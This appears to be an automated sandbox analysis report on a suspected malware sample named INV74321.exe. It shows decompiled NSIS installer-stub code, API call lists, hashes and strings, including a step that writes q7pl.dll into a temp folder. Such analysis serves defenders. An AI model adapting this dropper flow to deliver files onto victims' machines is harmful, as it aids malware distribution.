                                                          							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                          							_t104 = IsWindowEnabled(_t127);
                                                          							__eflags = _t104;
                                                          							if(_t104 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						SetWindowLongA(_t126, _t134, _t134);
                                                          						return 1;
                                                          					} else {
                                                          						DestroyWindow( *0x42ebf8);
                                                          						 *0x42ebf8 = _a12;
                                                          						L58:
                                                          						if( *0x42b890 == _t134) {
                                                          							_t143 =  *0x42ebf8 - _t134; // 0x0
                                                          							if(_t143 != 0) {
                                                          								ShowWindow(_t126, 0xa);
                                                          								 *0x42b890 = 1;
                                                          							}
                                                          						}
                                                          						L61:
                                                          						return 0;
                                                          					}
                                                          				}
                                                          			}
































                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                          • DestroyWindow.USER32 ref: 00403D14
                                                          • SetWindowLongA.USER32 ref: 00403D30
                                                          • GetDlgItem.USER32 ref: 00403D51
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                          • GetDlgItem.USER32 ref: 00403E1A
                                                          • GetDlgItem.USER32 ref: 00403E24
                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                          • GetDlgItem.USER32 ref: 00403F35
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                          • EnableMenuItem.USER32 ref: 00403FA0
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                          • String ID:
                                                          • API String ID: 4050669955-0
                                                          • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                          • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                          • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                          • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E0040390A(void* __eflags) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t17;
                                                          				void* _t25;
                                                          				void* _t27;
                                                          				int _t28;
                                                          				void* _t31;
                                                          				int _t34;
                                                          				int _t35;
                                                          				intOrPtr _t36;
                                                          				int _t39;
                                                          				char _t57;
                                                          				CHAR* _t59;
                                                          				signed char _t63;
                                                          				signed short _t67;
                                                          				CHAR* _t74;
                                                          				intOrPtr _t76;
                                                          				CHAR* _t81;
                                                          
                                                          				_t76 =  *0x42f434;
                                                          				_t17 = E00406500(2);
                                                          				_t84 = _t17;
                                                          				if(_t17 == 0) {
                                                          					_t74 = 0x42a890;
                                                          					"1033" = 0x30;
                                                          					 *0x436001 = 0x78;
                                                          					 *0x436002 = 0;
                                                          					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                                                          					__eflags =  *0x42a890;
                                                          					if(__eflags == 0) {
                                                          						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                                                          					}
                                                          					lstrcatA("1033", _t74);
                                                          				} else {
                                                          					_t67 =  *_t17(); // executed
                                                          					E00406055("1033", _t67 & 0x0000ffff);
                                                          				}
                                                          				E00403BCF(_t71, _t84);
                                                          				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                          				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                                                          				 *0x42f4dc = 0x10000;
                                                          				if(E00405B7D(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                          					L16:
                                                          					if(E00405B7D(_t92, _t80) == 0) {
                                                          						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                          					}
                                                          					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                          					 *0x42ec08 = _t25;
                                                          					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                          						L21:
                                                          						if(E0040140B(0) == 0) {
                                                          							_t27 = E00403BCF(_t71, __eflags);
                                                          							__eflags =  *0x42f4e0;
                                                          							if( *0x42f4e0 != 0) {
                                                          								_t28 = E004052F0(_t27, 0);
                                                          								__eflags = _t28;
                                                          								if(_t28 == 0) {
                                                          									E0040140B(1);
                                                          									goto L33;
                                                          								}
                                                          								__eflags =  *0x42ebec; // 0x0
                                                          								if(__eflags == 0) {
                                                          									E0040140B(2);
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							ShowWindow( *0x42a870, 5); // executed
                                                          							_t34 = E00406492("RichEd20"); // executed
                                                          							__eflags = _t34;
                                                          							if(_t34 == 0) {
                                                          								E00406492("RichEd32");
                                                          							}
                                                          							_t81 = "RichEdit20A";
                                                          							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                          							__eflags = _t35;
                                                          							if(_t35 == 0) {
                                                          								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                          								 *0x42ebe4 = _t81;
                                                          								RegisterClassA(0x42ebc0);
                                                          							}
                                                          							_t36 =  *0x42ec00; // 0x0
                                                          							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
                                                          							E0040385A(E0040140B(5), 1);
                                                          							return _t39;
                                                          						}
                                                          						L22:
                                                          						_t31 = 2;
                                                          						return _t31;
                                                          					} else {
                                                          						_t71 =  *0x42f420;
                                                          						 *0x42ebc4 = E00401000;
                                                          						 *0x42ebd0 =  *0x42f420;
                                                          						 *0x42ebd4 = _t25;
                                                          						 *0x42ebe4 = 0x40a1f4;
                                                          						if(RegisterClassA(0x42ebc0) == 0) {
                                                          							L33:
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                          						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					_t71 =  *(_t76 + 0x48);
                                                          					_t86 = _t71;
                                                          					if(_t71 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t74 = 0x42e3c0;
                                                          					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                                                          					_t57 =  *0x42e3c0; // 0x47
                                                          					if(_t57 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					if(_t57 == 0x22) {
                                                          						_t74 = 0x42e3c1;
                                                          						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
                                                          					}
                                                          					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                          					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                          						L15:
                                                          						E004060F7(_t80, E00405A8F(_t74));
                                                          						goto L16;
                                                          					} else {
                                                          						_t63 = GetFileAttributesA(_t74);
                                                          						if(_t63 == 0xffffffff) {
                                                          							L14:
                                                          							E00405AD6(_t74);
                                                          							goto L15;
                                                          						}
                                                          						_t92 = _t63 & 0x00000010;
                                                          						if((_t63 & 0x00000010) != 0) {
                                                          							goto L15;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}



























                                                          APIs
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV74321.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV74321.exe" ,00000000), ref: 00403985
                                                          • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74B5FA90), ref: 004039FA
                                                          • lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                          • GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                          • LoadImageA.USER32 ref: 00403A61
                                                          • RegisterClassA.USER32 ref: 00403A9E
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                          • CreateWindowExA.USER32 ref: 00403AEB
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                          • GetClassInfoA.USER32 ref: 00403B4D
                                                          • GetClassInfoA.USER32 ref: 00403B5A
                                                          • RegisterClassA.USER32 ref: 00403B63
                                                          • DialogBoxParamA.USER32 ref: 00403B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GHFGHFGHFDGDFGDFg$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 606308-3028286410
                                                          • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                          • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00402EA1(void* __eflags, signed int _a4) {
                                                          				DWORD* _v8;
                                                          				DWORD* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _v20;
                                                          				long _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				signed int _v44;
                                                          				long _t43;
                                                          				long _t50;
                                                          				void* _t57;
                                                          				intOrPtr* _t59;
                                                          				long _t60;
                                                          				long _t70;
                                                          				signed int _t77;
                                                          				intOrPtr _t80;
                                                          				long _t82;
                                                          				void* _t85;
                                                          				signed int _t87;
                                                          				void* _t89;
                                                          				long _t90;
                                                          				long _t93;
                                                          				intOrPtr* _t94;
                                                          
                                                          				_t82 = 0;
                                                          				_v12 = 0;
                                                          				_v8 = 0;
                                                          				_t43 = GetTickCount();
                                                          				_t91 = "C:\\Users\\hardz\\Desktop\\INV74321.exe";
                                                          				 *0x42f430 = _t43 + 0x3e8;
                                                          				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\INV74321.exe", 0x400);
                                                          				_t89 = E00405C90(_t91, 0x80000000, 3);
                                                          				_v16 = _t89;
                                                          				 *0x40a018 = _t89;
                                                          				if(_t89 == 0xffffffff) {
                                                          					return "Error launching installer";
                                                          				}
                                                          				_t92 = "C:\\Users\\hardz\\Desktop";
                                                          				E004060F7("C:\\Users\\hardz\\Desktop", _t91);
                                                          				E004060F7(0x437000, E00405AD6(_t92));
                                                          				_t50 = GetFileSize(_t89, 0);
                                                          				 *0x42944c = _t50;
                                                          				_t93 = _t50;
                                                          				if(_t50 <= 0) {
                                                          					L24:
                                                          					E00402E3D(1);
                                                          					if( *0x42f438 == _t82) {
                                                          						goto L29;
                                                          					}
                                                          					if(_v8 == _t82) {
                                                          						L28:
                                                          						_t94 = GlobalAlloc(0x40, _v24);
                                                          						E00403300( *0x42f438 + 0x1c);
                                                          						_push(_v24);
                                                          						_push(_t94);
                                                          						_push(_t82);
                                                          						_push(0xffffffff); // executed
                                                          						_t57 = E004030D8(); // executed
                                                          						if(_t57 == _v24) {
                                                          							 *0x42f434 = _t94;
                                                          							 *0x42f43c =  *_t94;
                                                          							if((_v44 & 0x00000001) != 0) {
                                                          								 *0x42f440 =  *0x42f440 + 1;
                                                          							}
                                                          							_t40 = _t94 + 0x44; // 0x44
                                                          							_t59 = _t40;
                                                          							_t85 = 8;
                                                          							do {
                                                          								_t59 = _t59 - 8;
                                                          								 *_t59 =  *_t59 + _t94;
                                                          								_t85 = _t85 - 1;
                                                          							} while (_t85 != 0);
                                                          							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                          							 *(_t94 + 0x3c) = _t60;
                                                          							E00405C4B(0x42f460, _t94 + 4, 0x40);
                                                          							return 0;
                                                          						}
                                                          						goto L29;
                                                          					}
                                                          					E00403300( *0x41d440);
                                                          					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
                                                          						goto L29;
                                                          					} else {
                                                          						goto L28;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t90 = _t93;
                                                          						asm("sbb eax, eax");
                                                          						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                                                          						if(_t93 >= _t70) {
                                                          							_t90 = _t70;
                                                          						}
                                                          						if(E004032EA(0x415440, _t90) == 0) {
                                                          							E00402E3D(1);
                                                          							L29:
                                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                          						}
                                                          						if( *0x42f438 != 0) {
                                                          							if((_a4 & 0x00000002) == 0) {
                                                          								E00402E3D(0);
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						E00405C4B( &_v44, 0x415440, 0x1c);
                                                          						_t77 = _v44;
                                                          						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                          							_a4 = _a4 | _t77;
                                                          							_t87 =  *0x41d440; // 0x8d79e
                                                          							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                                                          							_t80 = _v20;
                                                          							 *0x42f438 = _t87;
                                                          							if(_t80 > _t93) {
                                                          								goto L29;
                                                          							}
                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                          								_v8 = _v8 + 1;
                                                          								_t24 = _t80 - 4; // 0x40a194
                                                          								_t93 = _t24;
                                                          								if(_t90 > _t93) {
                                                          									_t90 = _t93;
                                                          								}
                                                          								goto L20;
                                                          							} else {
                                                          								break;
                                                          							}
                                                          						}
                                                          						L20:
                                                          						if(_t93 <  *0x42944c) {
                                                          							_v12 = E004065B7(_v12, 0x415440, _t90);
                                                          						}
                                                          						 *0x41d440 =  *0x41d440 + _t90;
                                                          						_t93 = _t93 - _t90;
                                                          					} while (_t93 != 0);
                                                          					_t82 = 0;
                                                          					goto L24;
                                                          				}
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INV74321.exe,00000400), ref: 00402ECE
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INV74321.exe,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00402F1A
                                                          • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INV74321.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-144457684
                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 61%
                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
                                                          				void* _t33;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          				FILETIME* _t49;
                                                          				FILETIME* _t62;
                                                          				void* _t64;
                                                          				signed int _t70;
                                                          				FILETIME* _t71;
                                                          				FILETIME* _t75;
                                                          				signed int _t77;
                                                          				void* _t80;
                                                          				CHAR* _t82;
                                                          				CHAR* _t83;
                                                          				void* _t85;
                                                          
                                                          				_t75 = __ebx;
                                                          				_t82 = E00402BCE(0x31);
                                                          				 *(_t85 - 8) = _t82;
                                                          				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                          				_t33 = E00405AFC(_t82);
                                                          				_push(_t82);
                                                          				_t83 = "GHFGHFGHFDGDFGDFg";
                                                          				if(_t33 == 0) {
                                                          					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                          				} else {
                                                          					E004060F7();
                                                          				}
                                                          				E004063D2(_t83);
                                                          				while(1) {
                                                          					__eflags =  *(_t85 + 8) - 3;
                                                          					if( *(_t85 + 8) >= 3) {
                                                          						_t64 = E0040646B(_t83);
                                                          						_t77 = 0;
                                                          						__eflags = _t64 - _t75;
                                                          						if(_t64 != _t75) {
                                                          							_t71 = _t64 + 0x14;
                                                          							__eflags = _t71;
                                                          							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                          						__eflags = _t70;
                                                          						 *(_t85 + 8) = _t70;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                          					if( *(_t85 + 8) == _t75) {
                                                          						E00405C6B(_t83);
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - 1;
                                                          					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                          					__eflags = _t41 - 0xffffffff;
                                                          					 *(_t85 - 0xc) = _t41;
                                                          					if(_t41 != 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                          					if( *(_t85 + 8) != _t75) {
                                                          						E0040521E(0xffffffe2,  *(_t85 - 8));
                                                          						__eflags =  *(_t85 + 8) - 2;
                                                          						if(__eflags == 0) {
                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                          						}
                                                          						L31:
                                                          						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                                                          						__eflags =  *0x42f4c8;
                                                          						goto L32;
                                                          					} else {
                                                          						E004060F7(0x40ac38, 0x430000);
                                                          						E004060F7(0x430000, _t83);
                                                          						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\hardz\AppData\Local\Temp\nsi6113.tmp\q7pl.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                          						E004060F7(0x430000, 0x40ac38);
                                                          						_t62 = E00405813("C:\Users\hardz\AppData\Local\Temp\nsi6113.tmp\q7pl.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                          						__eflags = _t62;
                                                          						if(_t62 == 0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t62 == 1;
                                                          							if(_t62 == 1) {
                                                          								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                                                          								L32:
                                                          								_t49 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_push(_t83);
                                                          								_push(0xfffffffa);
                                                          								E0040521E();
                                                          								L29:
                                                          								_t49 = 0x7fffffff;
                                                          							}
                                                          						}
                                                          					}
                                                          					L33:
                                                          					return _t49;
                                                          				}
                                                          				E0040521E(0xffffffea,  *(_t85 - 8));
                                                          				 *0x42f4f4 =  *0x42f4f4 + 1;
                                                          				_push(_t75);
                                                          				_push(_t75);
                                                          				_push( *(_t85 - 0xc));
                                                          				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                          				_t43 = E004030D8(); // executed
                                                          				 *0x42f4f4 =  *0x42f4f4 - 1;
                                                          				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                          				_t80 = _t43;
                                                          				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                          					L22:
                                                          					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                          				} else {
                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                          					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                          				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                          				__eflags = _t80 - _t75;
                                                          				if(_t80 >= _t75) {
                                                          					goto L31;
                                                          				} else {
                                                          					__eflags = _t80 - 0xfffffffe;
                                                          					if(_t80 != 0xfffffffe) {
                                                          						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
                                                          					} else {
                                                          						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                          						lstrcatA(_t83,  *(_t85 - 8));
                                                          					}
                                                          					_push(0x200010);
                                                          					_push(_t83);
                                                          					E00405813();
                                                          					goto L29;
                                                          				}
                                                          				goto L33;
                                                          			}

                                                          0x00401855
                                                          0x00401855
                                                          0x00401856
                                                          0x00401873
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00401858
                                                          0x00401858
                                                          0x00401859
                                                          0x00401492
                                                          0x00402387
                                                          0x00402387
                                                          0x00402387
                                                          0x00401856
                                                          0x0040184f
                                                          0x00402a65
                                                          0x00402a69
                                                          0x00402a69
                                                          0x00401883
                                                          0x00401888
                                                          0x0040188e
                                                          0x0040188f
                                                          0x00401890
                                                          0x00401893
                                                          0x00401896
                                                          0x0040189b
                                                          0x004018a1
                                                          0x004018a5
                                                          0x004018a7
                                                          0x004018af
                                                          0x004018bb
                                                          0x004018a9
                                                          0x004018a9
                                                          0x004018ad
                                                          0x00000000
                                                          0x00000000
                                                          0x004018ad
                                                          0x004018c4
                                                          0x004018ca
                                                          0x004018cc
                                                          0x00000000
                                                          0x004018d2
                                                          0x004018d2
                                                          0x004018d5
                                                          0x004018ed
                                                          0x004018d7
                                                          0x004018da
                                                          0x004018e3
                                                          0x004018e3
                                                          0x004018f2
                                                          0x004018f7
                                                          0x00402382
                                                          0x00000000
                                                          0x00402382
                                                          0x00000000

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,accumulate Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,74B5EA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
